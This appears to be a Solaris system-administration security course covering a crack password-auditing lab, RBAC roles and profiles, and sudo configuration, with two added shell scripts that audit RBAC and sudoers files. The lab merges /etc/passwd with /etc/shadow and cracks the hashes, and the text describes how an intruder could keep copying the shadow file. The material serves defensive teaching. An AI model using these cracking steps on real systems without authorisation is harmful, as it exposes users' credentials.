When invoked, the crack tool starts a separate background process called cracker to attempt to crack the passwords, and writes its results to a temporary data file. Because the cracker process can take considerable time to complete, monitor its progress with the ps command and use the Reporter command to view the results periodically.

Caution – Do not leave a password-cracking program on your system where it can be executed by regular users. Do not store the output of the program anywhere, and remove the merged password file as soon as the run is finished: it contains every user's encrypted password without the protection that /etc/shadow has.


Tools for Setting Good Passwords

There are freeware packages available that strengthen the passwd program by not allowing users to pick easy-to-guess passwords. These include:

● npasswd

● passwd+

● anlpasswd

These and other programs can be found on the Internet. (See "Additional Resources" on page 6-3 for the download site of the best known of these programs, npasswd.)

Another useful tool is AntiCrack, a password-checking program that uses the same rules and dictionaries as the crack program. The difference is that AntiCrack checks a 'raw' (unencrypted) UNIX password, so it does not have to encrypt every candidate and is therefore far faster than the crack tool. Use AntiCrack to check how secure a password is before using it.


Exercise: Securing Passwords

In this exercise, you complete the following tasks:

● Install and configure the crack tool

● Use the crack tool to find insecure passwords on your system

● Check your favorite passwords with the crack tool

Preparation

There is no preparatory work for this module.

Tasks

You are not required to finish all of the tasks in the time allocated by the instructor.

Task – Installing and Configuring the crack Tool

The crack version 5.0 package can be downloaded from:

ftp://ftp.cerias.purdue.edu/pub/tools/unix/pwdutils/

A copy has already been downloaded and saved in the /usr/local/pkg directory. To install and configure the crack tool:

1. Unpack the downloaded file (crack5_0.tar) using the tar command to create the directory crack50a. Follow the installation instructions in the file manual.html (or manual.txt) in the crack50a directory.

2. Edit the following two files to use the gcc compiler rather than the cc compiler:

/usr/local/crack50a/Crack
/usr/local/crack50a/src/libdes/Makefile.uni

3. Compile the crack tool as described in the manual.


Task – Running the crack Tool Against the System Passwords

The crack tool works best if the password data (user name, GCOS data, and so on) and the encrypted passwords are both used as source data. Do this by merging the files /etc/passwd and /etc/shadow to create a temporary file in the format of an older UNIX C1 password file. The crack tool provides a script in its scripts directory to do this.

1. Run the following script to create a temporary file of passwords to crack:

# cd /usr/local/crack50a
# scripts/shadmrg.sv >passwords

2. Run the crack tool against the combined passwords file:

# ./Crack passwords

3. This starts a separate background process called cracker that attempts to crack the passwords. You can see this process with the ps command or the top utility.

The crack tool writes its results to a data file and not to standard output. Use the Reporter command to view the results periodically, as follows:

# ./Reporter -quiet

If you have not changed the passwords for the users alice, bob, or eve, the crack tool finds bob's password (b0bb0b) almost immediately, takes about 15 minutes to guess alice's (w0nder), and does not guess eve's (3v3adam).

If you instead run the crack tool against the shadow file alone (crack needs only the encrypted password to work), as follows:

# ./Crack /etc/shadow

it fails to find bob's password: the GCOS words that crack derives that guess from are in /etc/passwd, not in /etc/shadow.

4. Stop the crack tool by entering:

# scripts/plaster

5. Clear any existing cracked-password list, so that a new clean run can be attempted, using:

# make tidy

6. How much of a threat do you think the crack tool is against modern C2-secure Solaris OE systems?

Task – Using the crack Tool to Check Favorite Passwords

1. Create a user account for yourself with a command such as:

# useradd -m -s /usr/bin/ksh test1

2. Use passwd to set the password for the test1 account – use one of your usual passwords.

3. Repeat these steps for as many passwords as you want to test, naming each extra account test2, test3, and so on. Remember that you might already have added a guest account as part of the exercises for Module 5.

4. Merge your entries in the /etc/passwd and /etc/shadow files into a file for the crack tool, selecting the merged lines by login name (the first colon-separated field):

# cd /usr/local/crack50a
# scripts/shadmrg.sv | grep '^test[0-9]*:' >mypasswords

5. Run the crack tool on this file after stopping the existing crack run and tidying the data files:

# scripts/plaster
# make tidy
# ./Crack mypasswords

6. Repeat these steps for all the passwords you want to test.


Exercise Summary

Discussion – Take a few minutes to discuss what experiences, issues, or discoveries you had during the lab exercise.

● Experiences

● Interpretations

● Conclusions

● Applications


Exercise Solutions

In this exercise, you use the crack tool to verify the security (or otherwise) of passwords on the system.

Installing and Configuring the crack Tool

Install and configure the crack tool as follows:

1. Unpack the crack5_0.tar file into the /usr/local directory using:

# cd /usr/local
# tar xvf pkg/crack5_0.tar
# cd crack50a

Study the manual.html or manual.txt file for instructions. The crack tool needs compiling and requires some changes to the Crack script and Makefile.uni, as described in the crack manual and explained below. The Solaris OE uses the standard crypt() mechanism for encrypting passwords.

2. Edit the Crack script: comment out the line that starts CC=cc (so that it reads #CC=cc) and uncomment the line #CC=gcc (so that it reads CC=gcc).

3. Make the same two edits to the src/libdes/Makefile.uni file.

4. Compile crack using:

# cd /usr/local/crack50a
# ./Crack -makeonly
# ./Crack -makedict

Running the crack Tool Against the System Passwords

There is no solution to this exercise. Follow the instructions provided on page 6-31.

Is the crack tool a threat against modern C2-secure Solaris OE systems? This depends on how well the /etc/shadow file is protected. The default permissions mean that only the root user can read the file. If an intruder gains root access, the intruder can leave a back door open and copy the shadow file to a user-readable file on a regular basis (perhaps using the cron command). This means that even when the root password changes, the intruder can crack the new password.


If the intruder obtains a copy of the /etc/shadow file from a backup tape or by 'sniffing' the network (both subjects are presented later in this course), then crack is another tool that the intruder can use.

Nevertheless, as long as the shadow file and its backups remain unreadable to ordinary users, crack is these days a limited threat to C2-secure Solaris OEs.

Using the crack Tool to Check Favorite Passwords

If crack failed to guess your passwords – congratulations!

If your passwords have been cracked, you must rethink the way you choose your favorite passwords.

Did crack find the password you set for the guest account in Module 5?


Module 7

Securing Root Access

Objectives

Upon completion of this module, you should be able to:

● Configure and use Role Based Access Control (RBAC)

● Configure and use the sudo utility


Relevance

Discussion – The following questions are relevant to understanding why root access to a system should be restricted:

● Why not let everyone have root access?

● Do you know how many administrators have the root password for your systems?

● Do you know what these administrators do on a daily basis?

● Do these administrators need full root access, or would a subset of commands suffice?

● Are these administrators trustworthy?

● How can you enable a user to perform privileged operations (such as backups) without giving them full superuser privileges?


Additional Resources

Additional resources – The following references provide additionalinformation on the topics described in this module:

● Solaris OE manual pages for auths(1), profiles(1), roles(1), roleadd(1M), rolemod(1M), useradd(1M), usermod(1M), auth_attr(4), exec_attr(4), prof_attr(4), and user_attr(4)

● Solaris AnswerBook version 2.

● Garfinkel, Simson, and Gene Spafford. Practical UNIX & Internet Security. O'Reilly & Associates, Inc., 1996.

● Frisch, Aeleen. Essential System Administration. 2nd Edition. O'Reilly & Associates, Inc., 1995.

● Winsor, Janice. Solaris System Administrator's Guide. 3rd Edition. Prentice Hall, 2000.

● Gregory, Peter H. Solaris Security. Prentice Hall, 1999.

Tool Downloads

● sudo, precompiled in Solaris OE package format [http://www.sunfreeware.com/]

● sudo online resources [http://www.courtesan.com/sudo]


Controlling Root Access

A major security problem with UNIX (and therefore with the Solaris OE) is that the superuser is so powerful and that other users are not powerful enough to fix their own problems. That is, there is not enough fine-grained control over the allocation of functionality to users. UNIX security is very much all (the root user) or nothing (everyone else).

Unless the system size and complexity is very small or the system administrator is super-human, secure system administration requires some superuser functionality to be available to a number of users. To control the actions of those users, it is useful to give them access to some privileged commands without giving them full superuser access. There are two approaches to providing this functionality:

● Role Based Access Control (RBAC) – A solution based on setting up roles, profiles, and authorizations. RBAC is specific to the Solaris OE, but other flavors of UNIX might have a proprietary package that provides similar functionality.

● The third-party sudo utility – A portable solution, easy to configure, that can be used on heterogeneous UNIX platforms, not just the Solaris OE.


Solaris OE Role Based Access Control (RBAC)

RBAC extends the basic access control for Solaris OE commands to allow any user to borrow certain UIDs when running particular commands. RBAC privileges are associated with either an individual user or a role. In RBAC, roles are preferred, because they simplify the management of large numbers of users. The user or role privileges support the ability to run a single command or a group of commands known as a profile. Grouping commands into profiles makes it easier to assign common sets of commands to multiple roles.

The RBAC authorization mechanism also supports other Solaris OE security packages such as the Basic Security Module (BSM).


Understanding RBAC Concepts

RBAC is built around the concepts of authorizations, roles, and profiles. Roles and profiles allocate extra command privileges, and authorizations grant access to functionality such as devices in BSM (see Module 3, “The Solaris OE Basic Security Module”).

Using Profiles

A profile is a grouping of one or more commands that simplifies the allocation of a single block of commands to multiple users. One or more profiles are usually allocated to roles.

Use the profiles(1) command to view a list of a user’s profiles (omit the username to view the profiles for the current user):

# profiles alice

Using Roles

A role is a special type of user account that performs a set of administrative tasks. Typically a role contains one or more profiles, and a user is associated with one or more roles to gain access to restricted functionality.

Use the roles(1) command, which accepts an optional username as a single parameter, to view a list of a user’s roles (omit the username to view the roles for the current user):

# roles alice

Using Authorizations

An authorization is a name associated with the right to access restricted functionality (typically devices under BSM). Use the auths(1) command to view a list of a user’s authorizations (omit the username to view the authorizations for the current user):

# auths alice


RBAC Commands

You can maintain the configuration files manually or use the commands shown in Table 7-1.

Table 7-1 RBAC Commands

Command – Meaning

roleadd – Creates roles and associates a role with an authorization or a profile (the -A and -P options, respectively).

rolemod and roledel – Provide support for modifying and deleting roles.

useradd – Provides support for associating users with roles, profiles, and authorizations using the -R, -P, and -A options, respectively.

roles, profiles, and auths – List users’ allocated roles, profiles, and authorizations, respectively.


Configuring RBAC Profiles

The Printer Management profile is a standard profile defined in the /etc/security/exec_attr file, as shown in Code 7-1.

Code 7-1 Standard Printer Management Profile

Printer Management:suser:cmd:::/usr/sbin/lpshut:euid=0
Printer Management:suser:cmd:::/usr/bin/cancel:euid=0
Printer Management:suser:cmd:::/usr/bin/enable:euid=lp
...


The /etc/security/exec_attr file contains several other lp administration commands defined in a similar manner to those shown in Code 7-1 on page 7-8. In the fragment shown in Code 7-1 on page 7-8, any user with the Printer Management profile can run the commands shown in Table 7-2.

The two fields after the profile name define the superuser security policy and the entity type of the command. These fields are fixed as suser and cmd, and should not be altered.

There is one standard profile called All which is defined in the /etc/security/exec_attr file as:

All:suser:cmd:::*:

This profile allows the user to run any command with no special privileges (using their current UID and GID). It is usual to grant all role users access to the All profile. If the user is not given access to the All profile, the user can only run the commands in their roles when running the profile shell.

You must use the configuration file /etc/security/prof_attr to define the profile, as used in the /etc/user_attr file:

Printer Management:::Manage printers:help=PrinterMgmt.html

This file links the profile with additional information, such as a description and a help file. This file is intended for use by GUI tools for working with the database.

Note – Currently there are no GUI tools for working with the RBAC database files.

Table 7-2 Commands for the Printer Management Profile

Command – Meaning

/usr/sbin/lpshut as root (effective UID of 0) – Lets the user stop the printer system

/usr/bin/cancel as root (effective UID of 0) – Lets the user cancel print jobs for any user

/usr/bin/enable as lp (effective UID of lp) – Lets the user enable an offline printer


Adding RBAC Profiles

There are no commands for maintaining profiles, so the two configuration files must be edited manually with a text editor, such as vi.

To add a new profile, give the new profile a name by creating an entry in the /etc/security/prof_attr file. For example, a new profile for user management, called User Management, is created using the new entry:

User Management:::Manage user accounts:

You must add the required commands for this profile to the /etc/security/exec_attr file. For example:

User Management:suser:cmd:::/usr/sbin/useradd:euid=0
User Management:suser:cmd:::/usr/sbin/usermod:euid=0
User Management:suser:cmd:::/usr/bin/passwd:uid=0

The passwd command requires the real UID to be that of the root user (zero), whereas usermod and useradd only require the effective UID to be zero.


Using RBAC Roles and Profiles

The key concept of RBAC is using roles to grant access to one or more commands which are executed using the privileges of another user (typically the root user). The commands themselves are associated with profiles, and the roles are associated with one or more profiles. Users can be associated with one or more roles or profiles.

Profiles are defined in configuration files, and a role is a special type of user account that is intended for performing a set of administrative tasks. The role account is like a regular user account, except that users can gain access to it only by using the su command; it is not accessible for regular logins.


A role user must be assigned one of the profile shells below:

● /usr/bin/pfsh for Bourne shell

● /usr/bin/pfksh for Korn shell

● /usr/bin/pfcsh for C shell

A profile shell is required so that commands are executed with the attributes specified by the user’s profiles in the /etc/security/exec_attr database file.

You do not need to create a home directory for a role user because roles should not be used for regular logins, only as the target of a su command. The role account needs a password to enable the user to assume the role.


Creating Roles

Use the useradd command to create the role. Alternatively, use the roleadd command to create the role and add authorization or profile entries to the configuration file /etc/user_attr.

For example, if a profile called Printer Management has been defined (this profile is provided by default with the Solaris 8 OE), then a new role associated with this profile can be created, as shown in Code 7-2.

Code 7-2 Example: Creating a New Role

# roleadd -P "Printer Management" Printers
# passwd Printers


The roleadd command verifies that the required profile (Printer Management) is defined in the files /etc/security/prof_attr and /etc/security/exec_attr. Code 7-3 shows sample configuration files.

Code 7-3 Role Configuration Files

# grep Printers /etc/passwd
Printers:x:111:1::/home/Printers:/bin/pfsh
# grep Printers /etc/user_attr
Printers::::type=role;profiles=Printer Management


Assigning Roles and Profiles

To understand the function of the RBAC configuration files, examine how an example user is granted access to the line printer administration commands. (The full format of the configuration files is not described here. See the online manual pages for full details.)

To define a role, the role must be added to the /etc/user_attr file (and must also have an account entry in the /etc/passwd and /etc/shadow files). The roleadd(1M) command creates the necessary entries when you use the -P option (as in Code 7-2 on page 7-13):

# roleadd -P "Printer Management" Printers

This command adds the following line to the /etc/user_attr file:

Printers::::type=role;profiles=Printer Management


Each user that needs access to that role must also be added to the /etc/user_attr file. Use the usermod command (or useradd if creating a new user) to create this entry:

# usermod -R Printers alice

This command grants alice access to the Printers role. The Printers role gives access to the Printer Management profile (see Code 7-1 on page 7-8). It is usual to also grant a user access to the profile All, which is described on page 7-9. Without this profile, the user can only access the commands in their allocated role. For example:

# usermod -R Printers -P All alice

This adds the following line to the /etc/user_attr file:

alice::::type=normal;roles=Printers;profiles=All

Note – The -R and -P options replace any existing role or profile settings.
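Following the user → role → profile → command chain by hand is error-prone, so here is an added example (not code from the course) of a shell script that resolves it against constructed copies of the three RBAC databases; the Users role, carol's entry, and the prof_attr line for All are assumptions made for the example.

```shell
# Added example (not from the Sun course): resolve which commands RBAC lets a
# user run by following user_attr -> roles -> profiles -> exec_attr, the way
# the profile shell does. The three databases are constructed samples in the
# formats shown in this module; the Users role, the prof_attr entry for All,
# and carol's undefined profile are assumptions made for the example. The
# real files are /etc/user_attr and /etc/security/{prof,exec}_attr.
RBAC_DIR=$(mktemp -d)
trap 'rm -rf "$RBAC_DIR"' EXIT

cat > "$RBAC_DIR/user_attr" <<'EOF'
Printers::::type=role;profiles=Printer Management
Users::::type=role;profiles=User Management
alice::::type=normal;roles=Printers;profiles=All
bob::::type=normal;roles=Printers,Users
carol::::type=normal;profiles=Backup Management
EOF

cat > "$RBAC_DIR/prof_attr" <<'EOF'
All:::Execute any command as the user or role:help=RtAll.html
Printer Management:::Manage printers:help=PrinterMgmt.html
User Management:::Manage user accounts:
EOF

cat > "$RBAC_DIR/exec_attr" <<'EOF'
All:suser:cmd:::*:
Printer Management:suser:cmd:::/usr/sbin/lpshut:euid=0
Printer Management:suser:cmd:::/usr/bin/cancel:euid=0
Printer Management:suser:cmd:::/usr/bin/enable:euid=lp
User Management:suser:cmd:::/usr/sbin/useradd:euid=0
User Management:suser:cmd:::/usr/sbin/usermod:euid=0
User Management:suser:cmd:::/usr/bin/passwd:uid=0
EOF

# Attribute list (field 5) of a user_attr(4) entry; empty if the name is absent.
user_attr_field() {  # $1 = user or role name
    awk -F: -v n="$1" '$1 == n { print $5; exit }' "$RBAC_DIR/user_attr"
}

# Values of one key in a ;-separated key=value list, one per line (values are
# comma-separated lists and may contain spaces, e.g. "Printer Management").
attr_values() {  # $1 = key, $2 = attribute list
    printf '%s\n' "$2" | tr ';' '\n' |
        awk -F= -v k="$1" '$1 == k { print $2 }' | tr ',' '\n'
}

# Profiles a user holds: those assigned directly plus those of each role the
# user may assume with su.
rbac_profiles() {  # $1 = user name
    attrs=$(user_attr_field "$1")
    attr_values profiles "$attrs"
    attr_values roles "$attrs" | while read -r role; do
        [ -n "$role" ] || continue
        attr_values profiles "$(user_attr_field "$role")"
    done
}

# exec_attr(4) cmd entries of every profile the user holds, printed as
# profile<TAB>command<TAB>attributes (euid=0, uid=0, or empty for "as yourself").
rbac_commands() {  # $1 = user name
    rbac_profiles "$1" | sort -u | while read -r prof; do
        [ -n "$prof" ] || continue
        awk -F: -v p="$prof" 'BEGIN { OFS = "\t" }
            $1 == p && $3 == "cmd" { print $1, $6, $7 }' "$RBAC_DIR/exec_attr"
    done
}

# Prints the attributes the user gets for one full path and succeeds, or fails
# when no profile grants it. A specific entry wins over the "*" entry of the
# All profile, which matches any command but confers no special identity.
rbac_can_run() {  # $1 = user name, $2 = full path of the command
    rbac_commands "$1" | awk -F'\t' -v c="$2" '
        $2 == c   { print $3; found = 1; exit }
        $2 == "*" { wild = 1 }
        END {
            if (found) exit 0
            if (wild) { print "(no special attributes)"; exit 0 }
            exit 1
        }'
}

# Profiles named in user_attr that have no prof_attr definition: the kind of
# inconsistency hand-editing (and miscounting colons) leaves behind, and
# what roleadd -P checks for before creating a role.
rbac_undefined_profiles() {
    awk -F: '{ print $5 }' "$RBAC_DIR/user_attr" | tr ';' '\n' |
        awk -F= '$1 == "profiles" { print $2 }' | tr ',' '\n' | sort -u |
        while read -r prof; do
            [ -n "$prof" ] || continue
            awk -F: -v p="$prof" '$1 == p { found = 1 } END { exit !found }' \
                "$RBAC_DIR/prof_attr" || printf '%s\n' "$prof"
        done
}

rbac_commands alice
rbac_can_run bob /usr/bin/passwd
rbac_undefined_profiles
```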


Assuming a Role

Using a role account, a user can access commands with special attributes (typically the root user ID), which are not available to users using regular accounts. A user gains access to or assumes a role using the su command:

# /bin/su Printers

The parameter to the su command is the role name Printers rather than a user name (roles are defined like users and have an entry in the /etc/passwd file).

After running the example su command and supplying the password for the role (Printers), the user is now running a profile shell (the default is the Bourne shell, /usr/bin/pfsh). The user only has access to the commands defined for that role (the printer administration commands). Some of these commands can be given special privileges, such as the ability to run as root (or lp in this example).


Evaluating RBAC

RBAC provides a flexible but complex means of allocating a subset of superuser functionality to one or more users. The mechanism can appear confusing because there is no obvious requirement for three different mechanisms—profiles, roles, and authorizations—to support running some commands with superuser privileges. In practice, RBAC supports other Solaris OE features such as BSM, which accounts for the range of functionality.

RBAC gives you fine-grained control over allocating access to privileged commands to individual users or groups of users. You can approximate the features of RBAC through the careful configuration of user groups and the SETGID functionality of commands, but you will not get the ease of administration and separation of functionality.

The configuration files are general purpose and have many columns of data which are currently unused. Therefore, you must count colons carefully when manually editing the files. Use the command line tools to simplify the maintenance of the RBAC files.


RBAC is not available on all UNIX platforms and will not appeal to administrators working in a heterogeneous environment because the system administrators cannot use the same technology to administer all platforms.

RBAC can run a profile shell which extends the capabilities of the user to include some privileged commands. The user must memorize another user account name (the role name) and password, but when the role has been assumed, the permitted commands are run as usual.


The sudo Utility

The sudo utility lets trusted users perform certain functions as though they were the root user, by providing access to a limited set of privileged commands. These users use their own password for authorization, and do not need to memorize another password.

Most sites with UNIX installations have multiple system administrators with varying skill levels, and the different systems usually have different root passwords. With the sudo utility, you can give users access to only a limited set of commands, according to the role performed by the user. For example, a novice administrator can add, delete, or modify users, while a more experienced administrator can access backup, restore, and shutdown utilities—all without having access to the root password.

When you execute commands as the root user, no record of what commands were run is logged (unless auditing is switched on). The sudo utility keeps a log of all successful and unsuccessful sudo attempts, providing data to track who performed a given command at what time. The sudo utility can also write logging information to syslogd.


Using the sudo Utility

To execute a restricted command with sudo, the user enters sudo followed by the command to execute. The sudo utility checks the /usr/local/etc/sudoers file (described in “Configuring the sudo Utility” on page 7-24) to verify whether the user has permission to execute the requested command. If the request is granted, the user is prompted for their own password. If the user enters the correct password, the command is executed. A user on the host can use the -l option to see which commands they can execute.


The example shown in Code 7-4 lists which sudo commands the current user can run. The command output includes a standard lecture compiled into the sudo utility.

Code 7-4 Command and Output Showing Which Commands the Current User Can Run

$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these two things:

    #1) Respect the privacy of others.
    #2) Think before you type.
Password:
You can run the following commands on this host:
    (root) /usr/sbin/shutdown


Introducing sudo Tickets

When users invoke sudo and enter the correct password, the system grants them a ticket for five minutes. Subsequent permitted commands do not require a password as long as the ticket remains valid. The ticket is refreshed every time the sudo utility runs. The sudo ticket is associated with the user name of the current user (as opposed to the shell PID or terminal device name).

The following example lets this user run the shutdown command (no password prompt is issued because the sudo ticket is still valid):

$ sudo shutdown -g 5 -i 0 -y
Shutdown started. Thursday April 19 14:21:26 BST 2001

Note – The full directory path for the command must match the command name in the configuration file (see “Configuring the sudo Utility” on page 7-24). This helps prevent Trojan horse programs from being run inadvertently.


Configuring the sudo Utility

When the sudo utility is installed, the default behavior is that all non-root users are denied sudo privileges. You must explicitly allow any actions you want to permit for users. Do this by configuring the /usr/local/etc/sudoers file to define the rules you want to implement.

The sudoers file also contains aliases and defaults for the sudo utility.

The easiest way to edit the configuration file is to use the supplied visudo utility:

# visudo

which checks the syntax of the sudoers file when you exit.

The rules allow you to specify which commands users can execute on which hosts. You can define aliases for users, hosts, and commands to simplify complex configurations.


The sudoers Format

The basic structure of a rule follows this format:

user host=commands [:host=commands] ...

where:

● user is the login ID of the user or an alias, or a group name if preceded by a percent sign (for example, %nogroup).

● host is the hostname or alias of the computer. This field allows a single sudo configuration file to be created for the enterprise and distributed to all hosts. Each host must have a copy of the sudo utility installed (sudo does not support remote execution of commands).

● commands is a comma-separated list of commands (or aliases) that the user can invoke using the sudo utility.


● Each command can be prefixed with a username in parentheses, to ensure that the command runs as a specific user (this requires that you use the “-u” option with the sudo command); by default all commands run as the root user.

The only configured command in the default file is:

# User privilege specification
root ALL=(ALL) ALL

This example allows root to run, on ALL hosts and as (ALL) users, ALL possible commands (each ALL is an example of a standard alias).

An example of a command is:

bob wallace=/usr/sbin/shutdown

which allows the user bob to run the shutdown command on the host wallace.


Using Aliases

Code 7-5, Code 7-6, and Code 7-7 on page 7-28 show the three types of aliases:

Code 7-5 Simple Alias Definitions

Cmnd_Alias DOWN=/usr/sbin/shutdown,/usr/sbin/reboot
Host_Alias WORKSTATIONS=grommit,wallace
User_Alias ADMIN=alice,bob

Alias names must be specified in all uppercase letters. When an alias has been defined it can be used just like a user, host, or command when assigning sudo privileges. For example:

Code 7-6 Using Aliases

alice ALL=/usr/sbin/init
bob penguin=DOWN
ADMIN ALL=DOWN


Aliases can include wildcards for commands and command line arguments. These are based on the shell file name generation characters. An exclamation mark (!) is a logical not operator, both in an alias and in front of a command. The example in Code 7-7 shows the use of both ! and * in an alias definition.

Code 7-7 Example: Wildcard Alias Definitions

Cmnd_Alias USERADMIN=/usr/sbin/user*, !/usr/sbin/userdel
Cmnd_Alias PASSWD=/usr/bin/passwd [A-Z]*

alice ALL=USERADMIN
ADMIN ALL=PASSWD

This alias allows alice to run the /usr/sbin/useradd and /usr/sbin/usermod commands (and any other command beginning with user in the /usr/sbin directory) but not /usr/sbin/userdel. Any user in the ADMIN alias can run the passwd command for a user whose login name starts with a capital letter. For both rules, there are no restrictions on hosts.

The online manual page for sudoers lists several other examples.


Using Defaults

In addition to rules and aliases, the sudoers file can also specify default values for a large number of configurable items. The following command lists all of the defaults available:

# sudo -L


The most useful defaults are the ones for logging (see “Logging sudo Activity” on page 7-31) but some others are worth considering, as shown in Table 7-3.

Table 7-3 Example Default Values

Default Values – Meaning

Defaults secure_path=/bin:/usr/bin:/usr/sbin:/usr/local/bin – Sets the PATH variable used by the sudo commands to a safe value. This protects against users having insecure PATH settings and allows you to control what commands can be run. Applies to all users.

Defaults:ADMIN !lecture – Does not display the standard warning banner when using the sudo command for users in the ADMIN alias.

Defaults:alice !authenticate – Does not ask alice for the password (this is obviously not a very secure option to configure).


Logging sudo Activity

By default, the Sun freeware package for sudo does not define any logging. You can enable logging to write to the Syslog daemon and to one or more logging files.

The following default setting in the sudoers file enables logging to syslogd as an auth entry:

Defaults syslog=auth

Successful sudo logins are flagged at notice priority and invalid logins at alert priority. A typical /etc/syslog.conf entry to add failed logins to a logging file would be:

auth.alert	/var/adm/auth.log

The system logging facility is described in detail in Module 2, “Using Solaris OE Log Files.”


You can also direct logging to a log file (not one of the Syslog files) by adding entries to the sudoers file:

Defaults logfile=/var/adm/sudo.log
Defaults:ADMIN !logfile

This example enables logging for all users except those in the ADMIN alias.

The sudo log contains the following information: the date and time that sudo was executed; who executed sudo; whether the user was privileged in the sudoers file to execute the command; and the command line that was used.

Code 7-8 Example sudo Log

# cat /var/adm/sudo.log
Apr 19 11:54:15 : eve : user NOT in sudoers ; TTY=pts/4 ; PWD=/export/home/eve ; USER=root ; COMMAND=/usr/bin/su
Apr 19 14:45:14 : alice : TTY=pts/2 ; PWD=/export/home/alice ; USER=root ; COMMAND=/usr/bin/shutdown

Note – The sudo utility also sends email to a named user (for example, the default root user) if an unauthorized user attempts to use sudo.


Security Implications of Using the sudo Utility

While the sudo utility has many advantages, it also has issues that system administrators should be aware of. If a sudo user's password is broken by an intruder, the intruder will have access to the user’s sudo commands.

It is good practice not to give sudo users root access to every command (ALL), or at least not to any command that has shell escape features (such as vi) or a shell command. If users can escape to a shell, then any command that is issued is run as root. Another problem is that sudo logging can be avoided by malicious users if they can escape to a shell while executing a privileged command from the sudo utility.
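As an added example (not part of the course or of sudo) covering both the sudoers format described earlier and this shell-escape warning, the shell script below expands Cmnd_Alias definitions and reports rules that grant ALL, a shell, or an editor with a shell escape; the sudoers fragment and the list of escape-capable commands are constructed assumptions.

```shell
# Added example (not from the sudo distribution or this course): audit a
# sudoers file for rules that hand out a full root shell. The file below is a
# constructed fragment in the format shown in this module; the list of shells
# and shell-escaping editors is an assumption to extend for your site.
SUDOERS=$(mktemp)
trap 'rm -f "$SUDOERS"' EXIT
cat > "$SUDOERS" <<'EOF'
# User alias specification
User_Alias ADMIN=alice,bob
Cmnd_Alias DOWN=/usr/sbin/shutdown, /usr/sbin/reboot
Cmnd_Alias USERADMIN=/usr/sbin/user*, !/usr/sbin/userdel
Cmnd_Alias EDIT=/usr/bin/vi, /usr/bin/ksh
Defaults syslog=auth
# User privilege specification
root ALL=(ALL) ALL
bob penguin=DOWN
alice ALL=USERADMIN
ADMIN ALL=EDIT
carol wallace=/usr/bin/passwd [A-Z]*, (lp) /usr/bin/enable
EOF

# Print user<TAB>host<TAB>command spec<TAB>reason for every grant of ALL, of a
# shell, or of an editor with a shell escape. Cmnd_Alias names are expanded;
# "!"-negated entries are skipped because they remove rights rather than add.
sudoers_audit() {  # $1 = sudoers file
    awk '
    function trim(s) { sub(/^[ \t]+/, "", s); sub(/[ \t]+$/, "", s); return s }
    function check(user, host, spec, expanded,    m, list, j, base, reason) {
        m = split(expanded, list, ",")
        for (j = 1; j <= m; j++) {
            list[j] = trim(list[j])
            if (list[j] ~ /^!/) continue
            base = list[j]; sub(/[ \t].*/, "", base); sub(/.*\//, "", base)
            if (list[j] == "ALL") reason = "grants ALL commands"
            else if (base in escape) reason = "shell escape via " base
            else continue
            printf "%s\t%s\t%s\t%s\n", user, host, spec, reason
        }
    }
    BEGIN {
        n = split("sh ksh csh bash vi vim ed", names, " ")
        for (i = 1; i <= n; i++) escape[names[i]] = 1
    }
    /^[ \t]*#/ || /^[ \t]*$/ { next }       # comments and blank lines
    $1 == "Cmnd_Alias" {                    # Cmnd_Alias NAME=cmd, cmd, ...
        line = $0; sub(/^[ \t]*Cmnd_Alias[ \t]+/, "", line)
        eq = index(line, "=")
        alias[trim(substr(line, 1, eq - 1))] = substr(line, eq + 1)
        next
    }
    $1 ~ /_Alias$/ || $1 ~ /^Defaults/ { next }
    {                                       # user host=(runas) cmd, cmd ...
        user = $1; rest = $0; sub(/^[ \t]*[^ \t]+[ \t]+/, "", rest)
        eq = index(rest, "="); host = trim(substr(rest, 1, eq - 1))
        cmds = substr(rest, eq + 1); gsub(/\([^)]*\)/, "", cmds)
        n = split(cmds, parts, ",")
        for (i = 1; i <= n; i++) {
            spec = trim(parts[i])
            check(user, host, spec, (spec in alias) ? alias[spec] : spec)
        }
    }' "$1"
}

sudoers_audit "$SUDOERS"
```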

The sudo utility uses time stamp files to implement a “ticketing” system. When a user invokes sudo and enters the correct password, they are granted a ticket for five minutes. (This time-out is configurable at compile time.) Each subsequent sudo command updates the ticket for another five minutes.


The long timeout period creates the risk of accidentally leaving a rootshell where others can physically get to your keyboard.

Note – It is possible for another user to use the sudo command within the five-minute time-out if the sudo user leaves the keyboard unattended. Therefore, sudo users should use the “sudo -k” command to invalidate the time stamp if they must leave the keyboard (but logging off would be better).

It is possible to reduce the ticket longevity using the sudoers configuration file. To switch off the ticketing feature so that the user always has to enter a password, add the following line to the sudoers file:

Defaults timestamp_timeout=0

To prevent command spoofing, the sudo utility always checks the current directory last when searching for a command, regardless of the position of the current directory in the user’s PATH environment variable (the current directory must appear in the PATH for this safety feature to take effect). However, the actual PATH is not modified and is passed unchanged to the utility that sudo executes.


Evaluating the sudo Utility

The following evaluation of the sudo utility, when compared with the RBAC appraisal given earlier, should aid you in deciding which is the appropriate tool for your environment.

The sudo utility stores its configuration information in a single file with basic syntax. However, having all the information in one file can be confusing.

The portability of the sudo utility makes it very attractive to administrators working in a heterogeneous environment.

Each command must be prefixed with sudo and the full path name must be given. Korn shell aliases can help reduce the amount of extra typing required. For example:

alias usermod='sudo /usr/sbin/usermod'


Exercise: Controlling Root Access

In this exercise, you complete the following tasks:

● Install and configure the sudo utility

● Configure RBAC

Preparation

There is no preparation for this module.

Tasks

You are not required to finish all of the tasks in the time allocated by the instructor.

Task – Installing and Configuring the sudo Utility

You can download the sudo package from the Sun freeware Web site. A copy has already been downloaded and saved in the /usr/local/pkg directory. Install this SVR4 package and then configure sudo so that:

● The user alice can run the useradd, usermod, and passwd commands on all systems

● The user bob can run the usermod and passwd commands only on your workstation

● Neither user can change the root password

● All sudo activity should be logged using the Syslog utility at auth level and recorded in the log file /var/adm/sc300log

Make use of aliases in the sudo configuration file so that it is easy to extend your system by adding new users or granting new permissions.


Task – Configuring RBAC

Configure RBAC so that:

● The user alice can run the useradd, usermod, and passwd commands

● The user bob can run the usermod and passwd commands

Use RBAC roles and profiles so it is easy to extend your system by adding new users or granting extra commands to existing users.


Exercise Summary


Discussion – Take a few minutes to discuss what experiences, issues, or discoveries you had during the lab exercise.

● Experiences

● Interpretations

● Conclusions

● Applications


Exercise Solutions

Below are the solutions on how to:

● Install and configure the sudo utility

● Configure RBAC

Installing and Configuring the sudo Utility

1. Install the sudo package:

# cd /usr/local/pkg
# pkgadd -d sudo-1.6.3p5-sol8-sparc-local

